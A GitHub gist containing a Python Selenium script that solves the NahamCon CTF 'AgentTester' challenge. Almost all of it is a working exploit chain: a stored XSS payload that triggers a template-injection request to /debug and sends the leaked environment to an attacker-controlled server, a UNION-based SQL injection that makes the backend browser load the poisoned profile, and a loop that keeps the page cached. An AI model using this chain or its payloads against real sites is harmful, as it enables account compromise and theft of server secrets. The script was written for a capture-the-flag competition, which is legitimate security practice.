Last active
March 15, 2021 15:01
-
-
Save jorgectf/d6a01fa0d8ba3905196b9b41a78ab4d1 to your computer and use it in GitHub Desktop.
NahamCon CTF's AgentTester solver.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from selenium import webdriver | |
from selenium.webdriver.common.keys import Keys | |
from selenium.webdriver.common.by import By | |
from selenium.webdriver.support.ui import WebDriverWait | |
from selenium.webdriver.support import expected_conditions as ec | |
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities | |
import random, string | |
import requests | |
def random_string(length): | |
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length)) | |
chall_url = "http://challenge.nahamcon.com:1337" # Change this | |
remote_server = "http://your.server" # Change this | |
username, password, uAgent = random_string(10), random_string(10), random_string(10) | |
email = f"{username}@{username}.com" | |
XSS = """"><script>fetch('/debug', {method: 'POST', headers: new Headers({'Content-Type': 'application/x-www-form-urlencoded'}), body: "code={{ environ }}"}).then(response => response.text()).then(data => fetch("%s/?leak="+encodeURIComponent(data)));</script>""" % remote_server | |
options = webdriver.ChromeOptions() | |
# options.add_argument('--headless') | |
options.add_argument('--no-sandbox') | |
options.add_argument("user-agent=%s" % uAgent) | |
# driver = webdriver.Remote("HUB_URL", options=options) | |
driver = webdriver.Chrome(options=options) | |
driver.get(chall_url + "/signup") | |
# Sing Up | |
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "usernameInput"))) | |
driver.find_element_by_id("usernameInput").send_keys(username) | |
driver.find_element_by_id("emailInput").send_keys(email) | |
driver.find_element_by_id("password1Input").send_keys(password) | |
driver.find_element_by_id("password2Input").send_keys(password) | |
driver.find_element_by_xpath("//button[@type='submit']").click() | |
# Sign In | |
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "passwordInput"))) | |
driver.find_element_by_id("usernameInput").send_keys(username) | |
driver.find_element_by_id("passwordInput").send_keys(password) | |
driver.find_element_by_id("submitButton").click() | |
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "userAgentInput"))) | |
# Retrieve session cookie | |
session_cookie = driver.get_cookie('auth2')["value"] | |
# Submit XSS in /profile/<id> | |
driver.find_element_by_xpath("//a[contains(@href,'profile')]").click() | |
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "aboutInput"))) | |
driver.find_element_by_id("aboutInput").send_keys(XSS) | |
profile_id = driver.current_url.split("/")[-1] # get profile ID | |
driver.find_element_by_xpath("//button[@type='submit']").click() | |
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "aboutInput"))) | |
# SQLi to make the backend browser visit our profile | |
SQLi = """' UNION SELECT '%s', '%s' -- """ % (uAgent, f"{chall_url}/profile/{profile_id}") | |
driver.find_element_by_xpath("//span[contains(@class,'title')]").click() | |
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "userAgentInput"))) | |
driver.find_element_by_id("userAgentInput").send_keys(SQLi) | |
driver.find_element_by_xpath("//button[@type='submit']").click() | |
while True: | |
print("Making request to keep the profile cached... Check your logs!") | |
print(requests.get(f"{chall_url}/profile/{profile_id}", cookies={'auth2': session_cookie}, headers={'User-Agent': uAgent}).headers) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment